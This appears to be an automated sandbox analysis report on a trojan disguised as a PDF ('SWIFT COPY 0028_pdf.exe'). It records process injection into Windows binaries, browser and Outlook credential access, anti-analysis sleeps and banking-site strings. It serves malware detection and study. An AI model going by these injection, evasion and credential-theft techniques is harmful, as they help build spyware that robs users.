                Source: SWIFT COPY 0028_pdf.exe, 00000000.00000003.2157110144.0000000003A6D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SWIFT COPY 0028_pdf.exe
                Source: SWIFT COPY 0028_pdf.exe, 00000000.00000003.2156512538.00000000038C3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SWIFT COPY 0028_pdf.exe
                Source: SWIFT COPY 0028_pdf.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@17/13
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0096CE7A GetLastError,FormatMessageW,0_2_0096CE7A
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0095AB84 AdjustTokenPrivileges,CloseHandle,0_2_0095AB84
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0095B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_0095B134
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0096E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0096E1FD
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00966532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00966532
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0097C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0097C18C
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0092406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_0092406B
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\aut7C9.tmpJump to behavior
                Source: SWIFT COPY 0028_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: rasautou.exe, 00000004.00000002.4606460151.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 00000004.00000002.4606460151.0000000003223000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 00000004.00000003.2510998129.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 00000004.00000003.2513407452.0000000003200000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: SWIFT COPY 0028_pdf.exeReversingLabs: Detection: 39%
                Source: unknownProcess created: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe "C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe"
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe"
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeProcess created: C:\Windows\SysWOW64\rasautou.exe "C:\Windows\SysWOW64\rasautou.exe"
                Source: C:\Windows\SysWOW64\rasautou.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe"Jump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeProcess created: C:\Windows\SysWOW64\rasautou.exe "C:\Windows\SysWOW64\rasautou.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: rasdlg.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: mprapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\rasautou.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: SWIFT COPY 0028_pdf.exeStatic file information: File size 1217536 > 1048576
                Source: SWIFT COPY 0028_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: SWIFT COPY 0028_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: SWIFT COPY 0028_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: SWIFT COPY 0028_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: SWIFT COPY 0028_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: SWIFT COPY 0028_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: SWIFT COPY 0028_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nBMWUKLuWlMJko.exe, 00000003.00000002.4611840716.00000000006CE000.00000002.00000001.01000000.00000004.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4602403236.00000000006CE000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: SWIFT COPY 0028_pdf.exe, 00000000.00000003.2154550142.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, SWIFT COPY 0028_pdf.exe, 00000000.00000003.2153324320.0000000003940000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2315069087.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2221830371.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2315069087.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2219817771.0000000003800000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 00000004.00000002.4613707846.0000000004F6E000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 00000004.00000003.2322691574.0000000004A7F000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 00000004.00000002.4613707846.0000000004DD0000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 00000004.00000003.2326045959.0000000004C23000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SWIFT COPY 0028_pdf.exe, 00000000.00000003.2154550142.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, SWIFT COPY 0028_pdf.exe, 00000000.00000003.2153324320.0000000003940000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2315069087.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2221830371.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2315069087.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2219817771.0000000003800000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, rasautou.exe, 00000004.00000002.4613707846.0000000004F6E000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 00000004.00000003.2322691574.0000000004A7F000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 00000004.00000002.4613707846.0000000004DD0000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 00000004.00000003.2326045959.0000000004C23000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: rasautou.exe, 00000004.00000002.4606460151.0000000003177000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 00000004.00000002.4614264307.00000000053FC000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2619893356.00000000245FC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: rasautou.exe, 00000004.00000002.4606460151.0000000003177000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 00000004.00000002.4614264307.00000000053FC000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2619893356.00000000245FC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: rasautou.pdbGCTL source: svchost.exe, 00000002.00000002.2314913469.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2282220992.0000000003613000.00000004.00000020.00020000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000003.00000003.2252387323.000000000081B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: rasautou.pdb source: svchost.exe, 00000002.00000002.2314913469.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2282220992.0000000003613000.00000004.00000020.00020000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000003.00000003.2252387323.000000000081B000.00000004.00000020.00020000.00000000.sdmp
                Source: SWIFT COPY 0028_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: SWIFT COPY 0028_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: SWIFT COPY 0028_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: SWIFT COPY 0028_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: SWIFT COPY 0028_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0093E01E LoadLibraryA,GetProcAddress,0_2_0093E01E
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00946B05 push ecx; ret 0_2_00946B18
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414118 push ebx; retf 2_2_0041412D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414123 push ebx; retf 2_2_0041412D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004051D4 push ebx; retf 2_2_004051E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004151AD push edx; ret 2_2_004151AE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00412A2B pushfd ; iretd 2_2_00412A2C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004032E0 push eax; ret 2_2_004032E2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418A96 push edi; ret 2_2_00418A97
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DB8C push esi; iretd 2_2_0040DB8D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004013B0 push eax; ret 2_2_004014F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004013B0 push edx; ret 2_2_00401734
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004193BE push esp; retf 2_2_004193BF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D415 push cs; ret 2_2_0040D42F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004014C2 push eax; ret 2_2_004014F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414CE7 push ds; iretd 2_2_00414CCC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414CAD push ds; iretd 2_2_00414CCC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041AD76 push esi; ret 2_2_0041AD8A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040852B pushfd ; ret 2_2_00408534
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401725 push edx; ret 2_2_00401734
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417F37 push ebp; ret 2_2_00417F38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00419794 pushfd ; ret 2_2_004197A9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004087BB push FFFFFFBBh; retf 2_2_004087BE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0225F pushad ; ret 2_2_03C027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C027FA pushad ; ret 2_2_03C027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C309AD push ecx; mov dword ptr [esp], ecx2_2_03C309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0283D push eax; iretd 2_2_03C02858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C01368 push eax; iretd 2_2_03C01369
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C01065 push edi; ret 2_2_03C0108A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C018F3 push edx; iretd 2_2_03C01906
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeCode function: 3_2_02DE2ADE push edi; ret 3_2_02DE2ADF
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exeCode function: 3_2_02DDCA73 pushfd ; iretd 3_2_02DDCA74
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00988111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00988111
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0093EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0093EB42
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0094123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0094123A
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeAPI/Special instruction interceptor: Address: 102811C
                Source: C:\Windows\SysWOW64\rasautou.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\rasautou.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\rasautou.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\rasautou.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\rasautou.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\rasautou.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\rasautou.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\rasautou.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7096E rdtsc 2_2_03C7096E
                Source: C:\Windows\SysWOW64\rasautou.exeWindow / User API: threadDelayed 9839Jump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeEvaded block: after key decisiongraph_0-94934
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-95465
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeAPI coverage: 4.6 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\rasautou.exeAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\rasautou.exe TID: 5168Thread sleep count: 134 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exe TID: 5168Thread sleep time: -268000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exe TID: 5168Thread sleep count: 9839 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exe TID: 5168Thread sleep time: -19678000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe TID: 3544Thread sleep time: -80000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe TID: 3544Thread sleep count: 44 > 30Jump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe TID: 3544Thread sleep time: -66000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe TID: 3544Thread sleep count: 44 > 30Jump to behavior
                Source: C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe TID: 3544Thread sleep time: -44000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\rasautou.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00966CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00966CA9
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_009660DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_009660DD
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_009663F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_009663F9
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0096EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0096EB60
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0096F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0096F5FA
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0096F56F FindFirstFileW,FindClose,0_2_0096F56F
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00971B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00971B2F
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00971C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00971C8A
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00971F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00971F94
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_02E6CC00 FindFirstFileW,FindNextFileW,FindClose,4_2_02E6CC00
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0093DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0093DDC0
                Source: rasautou.exe, 00000004.00000002.4616647777.0000000007EE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,116964875L
                Source: 3q3Zl7JL.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: 3q3Zl7JL.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: 3q3Zl7JL.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: 3q3Zl7JL.4.drBinary or memory string: discord.comVMware20,11696487552f
                Source: 3q3Zl7JL.4.drBinary or memory string: bankofamerica.comVMware20,11696487552x
